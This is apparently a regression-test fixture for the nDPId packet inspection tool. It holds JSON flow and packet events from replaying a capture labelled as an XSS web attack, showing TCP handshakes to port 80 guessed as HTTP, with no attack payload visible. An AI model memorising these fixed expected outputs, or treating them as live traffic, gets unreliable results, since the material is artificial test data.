+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2897,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":204,"flow_packet_id":2,"flow_last_seen":1499347315631,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347315631,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2lDsZegJCnXwU6AScSBoCAAAAgQFtAQCCAoD5A0tATo7twEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2898,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":204,"flow_packet_id":3,"flow_last_seen":1499347315631,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347315631,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0y+ZAAD4G+fGsEAABwKgKMtpQAFAKdfBT7GXoCoAQAOUHEAAAAQEICgE6O7cD5A0t"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2914,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347318180,"flow_last_seen":1499347318180,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347318180,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55914,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2914,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":205,"flow_packet_id":1,"flow_last_seen":1499347318180,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347318180,"pkt":"ABm5CmnxAMGxFOsxCABFAAA81llAAD4G73asEAABwKgKMtpqAFAYI+htAAAAAKACchBESgAAAgQFtAQCCAoBOj40AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2915,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":205,"flow_packet_id":2,"flow_last_seen":1499347318180,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347318180,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2mqVHZfsGCPobqAScSAEkQAAAgQFtAQCCAoD5A+qATo+NAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2916,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":205,"flow_packet_id":3,"flow_last_seen":1499347318181,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347318181,"pkt":"ABm5CmnxAMGxFOsxCABFAAA01lpAAD4G732sEAABwKgKMtpqAFAYI+hulR2X7YAQAOWjmAAAAQEICgE6PjQD5A+q"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2926,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347319466,"flow_last_seen":1499347319466,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347319466,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55928,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2926,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":206,"flow_packet_id":1,"flow_last_seen":1499347319466,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347319466,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8vPhAAD4GCNisEAABwKgKMtp4AFBaBoOOAAAAAKACchBl9gAAAgQFtAQCCAoBOj92AAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2927,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":206,"flow_packet_id":2,"flow_last_seen":1499347319466,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347319466,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2ni9VjICWgaDj6AScSBirAAAAgQFtAQCCAoD5BDsATo\/dgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2928,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":206,"flow_packet_id":3,"flow_last_seen":1499347319467,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347319467,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0vPlAAD4GCN+sEAABwKgKMtp4AFBaBoOPvVYyA4AQAOUBtAAAAQEICgE6P3YD5BDs"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2941,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347320712,"flow_last_seen":1499347320712,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347320712,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55942,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2941,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":207,"flow_packet_id":1,"flow_last_seen":1499347320712,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347320712,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8tK5AAD4GESKsEAABwKgKMtqGAFAqvPQDAAAAAKACchAjhgAAAgQFtAQCCAoBOkCtAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2942,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":207,"flow_packet_id":2,"flow_last_seen":1499347320712,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347320712,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2oZaSFgWKrz0BKAScSBb\/wAAAgQFtAQCCAoD5BIjATpArQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2943,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":207,"flow_packet_id":3,"flow_last_seen":1499347320712,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347320712,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0tK9AAD4GESmsEAABwKgKMtqGAFAqvPQEWkhYF4AQAOX7BgAAAQEICgE6QK0D5BIj"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2956,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347323234,"flow_last_seen":1499347323234,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347323234,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55968,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2956,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":208,"flow_packet_id":1,"flow_last_seen":1499347323234,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347323234,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8CttAAD4GuvWsEAABwKgKMtqgAFDxkUn\/AAAAAKACchAEJAAAAgQFtAQCCAoBOkMkAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2957,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":208,"flow_packet_id":2,"flow_last_seen":1499347323234,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347323234,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2qDnEfYn8ZFKAKAScSAPSwAAAgQFtAQCCAoD5BSaATpDJAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2958,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":208,"flow_packet_id":3,"flow_last_seen":1499347323235,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347323235,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0CtxAAD4GuvysEAABwKgKMtqgAFDxkUoA5xH2KIAQAOWuUgAAAQEICgE6QyQD5BSa"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2965,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347188799,"flow_last_seen":1499347194667,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347323705,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54538,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2965,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347188799,"flow_last_seen":1499347194667,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347323705,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54538,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2965,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347190051,"flow_last_seen":1499347195667,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347323705,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54552,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2965,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347190051,"flow_last_seen":1499347195667,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347323705,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54552,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2965,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347191299,"flow_last_seen":1499347196667,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347323705,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54566,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2965,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347191299,"flow_last_seen":1499347196667,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347323705,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54566,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2965,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347192547,"flow_last_seen":1499347197669,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347323705,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54580,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2965,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347192547,"flow_last_seen":1499347197669,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347323705,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54580,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2965,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347195099,"flow_last_seen":1499347200670,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347323705,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54606,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2965,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347195099,"flow_last_seen":1499347200670,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347323705,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54606,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2965,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347196341,"flow_last_seen":1499347201670,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347323705,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54620,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2965,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347196341,"flow_last_seen":1499347201670,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347323705,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54620,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2965,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347197627,"flow_last_seen":1499347202671,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347323705,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54634,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2965,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347197627,"flow_last_seen":1499347202671,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347323705,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54634,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2968,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347324538,"flow_last_seen":1499347324538,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347324538,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55982,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2968,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":209,"flow_packet_id":1,"flow_last_seen":1499347324538,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347324538,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8uCpAAD4GDaasEAABwKgKMtquAFARp\/xAAAAAAKACchAweQAAAgQFtAQCCAoBOkRqAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2969,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":209,"flow_packet_id":2,"flow_last_seen":1499347324538,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347324538,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2q5SOt2REaf8QaAScSDnxwAAAgQFtAQCCAoD5BXgATpEagEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2970,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":209,"flow_packet_id":3,"flow_last_seen":1499347324539,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347324539,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0uCtAAD4GDa2sEAABwKgKMtquAFARp\/xBUjrdkoAQAOWGzwAAAQEICgE6RGoD5BXg"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2980,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347325777,"flow_last_seen":1499347325777,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347325777,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55996,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2980,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":210,"flow_packet_id":1,"flow_last_seen":1499347325777,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347325777,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8C\/ZAAD4GudqsEAABwKgKMtq8AFA4wE5pAAAAAKACchC19AAAAgQFtAQCCAoBOkWfAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2981,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":210,"flow_packet_id":2,"flow_last_seen":1499347325777,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347325777,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2rxxlybyOMBOaqAScSADUQAAAgQFtAQCCAoD5BcVATpFnwEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2983,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":210,"flow_packet_id":3,"flow_last_seen":1499347325777,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347325777,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0C\/dAAD4GueGsEAABwKgKMtq8AFA4wE5qcZcm84AQAOWiVwAAAQEICgE6RaAD5BcV"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2998,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347328298,"flow_last_seen":1499347328298,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347328298,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56022,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2998,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":211,"flow_packet_id":1,"flow_last_seen":1499347328298,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347328298,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8K4RAAD4GmkysEAABwKgKMtrWAFBZCmOSAAAAAKACchB98AAAAgQFtAQCCAoBOkgWAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2999,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":211,"flow_packet_id":2,"flow_last_seen":1499347328299,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347328299,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2tYFgFaJWQpjk6AScSAFVgAAAgQFtAQCCAoD5BmMATpIFgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3000,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":211,"flow_packet_id":3,"flow_last_seen":1499347328299,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347328299,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0K4VAAD4GmlOsEAABwKgKMtrWAFBZCmOTBYBWioAQAOWkXQAAAQEICgE6SBYD5BmM"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3010,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347329594,"flow_last_seen":1499347329594,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347329594,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56036,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3010,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":212,"flow_packet_id":1,"flow_last_seen":1499347329594,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347329594,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8olxAAD4GI3SsEAABwKgKMtrkAFD4u+sGAAAAAKACchBVeAAAAgQFtAQCCAoBOklaAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3011,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":212,"flow_packet_id":2,"flow_last_seen":1499347329594,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347329594,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2uSvjPx7+LvrB6AScSCLmgAAAgQFtAQCCAoD5BrQATpJWgEDAwc="} 